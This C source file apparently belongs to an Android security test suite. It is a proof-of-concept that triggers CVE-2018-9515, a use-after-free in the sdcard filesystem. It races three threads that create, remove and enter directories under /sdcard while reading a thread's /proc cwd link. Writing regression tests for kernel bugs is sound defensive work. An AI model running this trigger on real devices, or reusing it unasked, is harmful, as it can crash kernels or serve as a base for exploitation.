1 #define _GNU_SOURCE
2 #include <pthread.h>
3 #include <err.h>
4 #include <stdio.h>
5 #include <unistd.h>
6 #include <string.h>
7 #include <time.h>
8 #include <sys/types.h>
9 #include <sys/stat.h>
10 #include <sys/syscall.h>
11 #include "../includes/common.h"
12
13 pid_t looper_pid;
14
uaf_worker(void * unused)15 void *uaf_worker(__attribute__ ((unused)) void *unused) {
16 char cwd_path[100];
17 sprintf(cwd_path, "/proc/self/task/%d/cwd", (int)looper_pid);
18
19 time_t timer = start_timer();
20 while (timer_active(timer)) {
21 char symlink_target[1000];
22 int len = readlink(cwd_path, symlink_target, sizeof(symlink_target)-1);
23 if (len > 0) {
24 symlink_target[len] = 0;
25 }
26 }
27
28 return NULL;
29 }
30
chaos_worker(void * unused)31 void *chaos_worker(__attribute__ ((unused)) void *unused) {
32 if (chdir("/sdcard/Android/data/CVE-2018-9515"))
33 err(1, "chdir");
34 rmdir("subdir");
35
36 time_t timer = start_timer();
37 while (timer_active(timer)) {
38 if (mkdir("subdir", 0777))
39 err(1, "mkdir");
40 if (chdir("subdir"))
41 err(1, "chdir");
42 if (rmdir("../subdir"))
43 err(1, "rmdir");
44 if (chdir(".."))
45 err(1, "chdir");
46 }
47
48 return NULL;
49 }
50
main(void)51 int main(void) {
52 looper_pid = syscall(__NR_gettid);
53
54 pthread_t thread;
55 if (pthread_create(&thread, NULL, uaf_worker, NULL))
56 errx(1, "pthread_create failed");
57
58 pthread_t thread2;
59 if (pthread_create(&thread2, NULL, chaos_worker, NULL))
60 errx(1, "pthread_create failed");
61
62 char my_dir_name[100];
63 sprintf(my_dir_name, "/sdcard/Android/data/CVE-2018-9515/foobar");
64 rmdir(my_dir_name);
65
66 time_t timer = start_timer();
67 while (timer_active(timer)) {
68 if (mkdir(my_dir_name, 0777))
69 err(1, "looper: mkdir");
70 if (rmdir(my_dir_name))
71 err(1, "looper: rmdir");
72 }
73
74 return 0;
75 }
76